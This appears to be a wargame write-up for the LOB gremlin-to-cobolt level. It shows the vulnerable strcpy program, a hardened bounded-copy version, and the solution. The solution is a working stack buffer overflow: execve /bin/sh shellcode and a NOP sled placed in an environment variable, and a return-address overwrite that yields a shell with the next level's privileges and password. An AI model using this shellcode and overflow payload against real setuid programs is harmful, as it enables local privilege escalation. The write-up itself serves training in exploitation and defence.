[2] gremlin -> cobolt ( Small BOF )
2017. 11. 17. 13:17 · SystemHacking/LOB(BOF원정대)
gremlin / hello bof world
Required before starting the challenge !!
[gremlin@localhost gremlin]$ /bin/bash2
[gremlin@localhost gremlin]$ export SHELL=/bin/bash2
[ cobolt.c ]
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[16];                 /* small buffer: only 16 bytes */
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);         /* unbounded copy of argv[1] into buffer */
    printf("%s\n", buffer);
}
[ Stack layout ]
buffer      16 bytes
saved ebp    4 bytes
saved eip    RET
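The root cause is the unbounded strcpy into the 16-byte buffer. As an added example (not code from the post or from the LOB binary), here is the same program shape with a bounded copy that refuses oversize input instead of overflowing; copy_bounded and arg_fits are hypothetical helper names.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 16   /* same buffer size as cobolt.c */

/* Hardened replacement for strcpy(buffer, argv[1]) (hypothetical helper):
 * copies src into dst only if it fits, terminator included.
 * Returns 0 on success, -1 if the input would overflow dst. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    /* look for the terminator within dst_size bytes only, never further */
    const char *nul = memchr(src, '\0', dst_size);
    if (nul == NULL)
        return -1;                       /* no room for data + NUL: refuse */
    size_t len = (size_t)(nul - src);    /* len <= dst_size - 1 here */
    memcpy(dst, src, len + 1);           /* copy data plus terminator */
    return 0;
}

/* Returns 1 if arg would be accepted into a 16-byte buffer, 0 if rejected */
int arg_fits(const char *arg)
{
    char tmp[BUF_SIZE];
    return copy_bounded(tmp, sizeof tmp, arg) == 0;
}

/* cobolt.c with the bounded copy in place of strcpy */
int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];
    if (argc < 2) {
        printf("argv error\n");
        exit(0);
    }
    if (copy_bounded(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argv[1] too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}
```

A 20-byte argument like the one used in the payload below is rejected before any copy happens, so the saved ebp and saved eip are never touched.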
< Solution >
1> Put the shellcode in an environment variable
$ export tmp=$(python -c 'print "\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')
$ Check it with env !
2> Write the payload
[gremlin@localhost gremlin]$ ./cobolt $(python -c 'print "A" * 20 + "\xaa\xfa\xff\xbf"')
AAAAAAAAAAAAAAAAAAAA▒▒▒▒
bash$ id
uid=501(gremlin) gid=501(gremlin) euid=502(cobolt) egid=502(cobolt) groups=501(gremlin)
bash$ my-pass
euid = 502
hacking exposed
bash$